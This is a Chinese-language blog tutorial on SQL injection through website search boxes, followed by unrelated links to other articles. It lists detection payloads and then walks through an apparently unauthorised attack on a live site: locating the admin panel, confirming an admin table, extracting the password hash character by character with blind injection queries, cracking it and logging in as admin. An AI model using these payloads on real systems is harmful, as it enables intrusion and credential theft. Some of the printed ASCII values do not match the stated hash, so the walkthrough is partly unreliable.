搜索框注入

简介: 如果没有说错的话,在国内应该是lake2最早提出搜索型文本框注入的。这个问题我也是最近才搞明白的,因为上网时间少,工作又比较忙,所以很少时间来学习。

如果没有说错的话,在国内应该是lake2最早提出搜索型文本框注入的。这个问题我也是最近才搞明白的,因为上网时间少,工作又比较忙,所以很少时间来学习。以前很傻以为搜索型注入就是直接在文本框中输入and 1=1 和and 1=2,结果每次都是出现同样的页面,说是什么没有找到你搜索的关键词,汗啊
曾经有个人就说过,中国的黑客满地都是啊;而且有一项调查显示,中国有超过50%的大学生想成为黑客,这也许就是中国第三代黑客基本山都是在校大学生了。
经过N多人是使用阿D和明小子,现在很明显的注入漏洞已经很少了。记得有个人说的比较对,要是没有中国的“黑客”的努力,中国的网络安全发展的不会这么快,其实这句话说的不无道理。
跑题了................
说到注入,最根本的原因是程序员在写程序的时候没有把数字和字符过滤严格,所以只要是涉及到注入就要联系到 and 1=1 and 1=2经典的判断语句,不过搜索型注入也是在普通SQL基础上的一个升华
判断搜索型注入的方法:
1 搜索keywords‘,如果出错的话,有90%的可能性存在漏洞;
2 搜索 keywords%,如果同样出错的话,就有95%的可能性存在漏洞;
3 搜索keywords% 'and 1=1 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=1)看返回的情况
4 搜索keywords% 'and 1=2 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=2)看返回的情况
5 根据两次的返回情况来判断是不是搜索型文本框注入了
后面就是手工注入了,和普通的SQL注入是一样的了...
手工注入还是先判断一下数据库类型,如果是MSSQL,就可以使用 order by/union/concat/update/等关键词来提高工作效率
如果是ACCESS的话,就是苦力活了,一个一个猜吧

 

首先判断注入点,在查询关键字那里输入:4%' and 1=1 and '%' ='    返回正常,没报错,

然后输入:4%' and 1=2 and '%' ='  报错了,说明这个地方是存在注入点的。
这个是post的方式的,抓包之后,本来打算用工具来跑的,试了一下,没检测出来,我就用手工来慢慢检测吧。
我没有马上查表名,而是去看了看后台,直接在域名后面加上admin成功爆出后台,找到后台后看了一下这个后台的源文件。

好了,我们先来查询一下表名吧,在搜索框里输入:%'and(select count(*)from admin)>0 and '%'='     返回正常,说明这个admin表存在。

我再来查看一下字段吧,从刚才查看那个后台的源文件得知有psw这个字段,查询字段:
4%'and(select top 1 len(psw)from admin) and '%'='  返回正常。

现在重点来了,我们查一下它里面的内容吧
4%'and(select top 1 asc(mid(psw,1,1))from admin)>54 and '%'='  
4%'and(select top 1 asc(mid(psw,2,1))from admin)>49 and '%'='  
4%'and(select top 1 asc(mid(psw,3,1))from admin)>54 and '%'='  
4%'and(select top 1 asc(mid(psw,4,1))from admin)>96 and '%'='  
4%'and(select top 1 asc(mid(psw,5,1))from admin)>100 and '%'='
4%'and(select top 1 asc(mid(psw,6,1))from admin)>98 and '%'='  
4%'and(select top 1 asc(mid(psw,7,1))from admin)>48 and '%'='  
4%'and(select top 1 asc(mid(psw,8,1))from admin)>97 and '%'='  
4%'and(select top 1 asc(mid(psw,9,1))from admin)>96 and '%'='  
4%'and(select top 1 asc(mid(psw,10,1))from admin)>53 and '%'='
4%'and(select top 1 asc(mid(psw,11,1))from admin)>99 and '%'='
4%'and(select top 1 asc(mid(psw,12,1))from admin)>55 and '%'='
4%'and(select top 1 asc(mid(psw,13,1))from admin)>100 and '%'='
4%'and(select top 1 asc(mid(psw,14,1))from admin)>49 and '%'='  
4%'and(select top 1 asc(mid(psw,15,1))from admin)>51 and '%'='   
4%'and(select top 1 asc(mid(psw,16,1))from admin)>56 and '%'='   
手工注入就是麻烦,通过我慢慢的检测,成功爆出了相应的值:
55 50 55 97 101 99 49 98 97 54 96 56 101 50 52 57
用转换工具转换了一下得出:727aec1ba6d8e249 (md5值)
解密之后就是:101010
我试了一下用户名admin果然正确,登录后台。

 

目录
相关文章
|
9月前
|
Java Maven 数据安全/隐私保护
一个简单的自定义输入框
今天还是一篇关于自定义View相关的,带来一个大众的,常见的一个输入框,很多的场合下都能遇到,比如验证码,密码框等等,配置了很多常见的属性,可以满足不同场合下的需求,矩形框,圆角框,下划线等等均可满足,长度设置,光标选择,背景选择,均可控制。
|
4月前
|
Python
SSTI模板注入
SSTI模板注入
45 1
|
8月前
|
小程序 JavaScript UED
小程序封装公共搜索框
通过封装全局搜索框组件,并通过从父组件传递参数的方式,实现搜索框样式的定制化,可以大大提高代码复用性和可维护性。同时,小程序的组件化开发模式,也可以为我们提供更加灵活和高效的开发方式。在实际开发中,我们可以根据具体需求,进一步优化搜索框组件的功能和样式,以实现更好的用户体验和开发效率。
42 0
|
Windows
【clswindow框架应用】对于一个窗体中存在多个相同类名的输入框该如何区分填写?
【clswindow框架应用】对于一个窗体中存在多个相同类名的输入框该如何区分填写?
99 0
|
小程序
小程序中如何实现搜索框样式
小程序中如何实现搜索框样式
407 0
小程序中如何实现搜索框样式
|
小程序
小程序实战之搜索框组件的封装与模糊搜索的实现
点击搜索框,跳转到搜索页,输入搜索词,可以获取到相关信息并渲染,从设计上来讲,整个需求需要拆分为两个核心步骤即搜索框组件封装与模糊搜索,下面将从这两部分来讲。
293 0
小程序实战之搜索框组件的封装与模糊搜索的实现
[自定义服务器控件] 第一步:文本框。
最近在整理我写的几个服务器控件,发出来与大家共享吧。 我写的自定义服务器控件呢分为两个类, 一是“简单继承”控件,就是继承框架里的控件然后加点属性了、事件了什么的。 二是“功能”控件,简单的说那是符合控件,但是呢是以实现一种功能为目的地。
794 0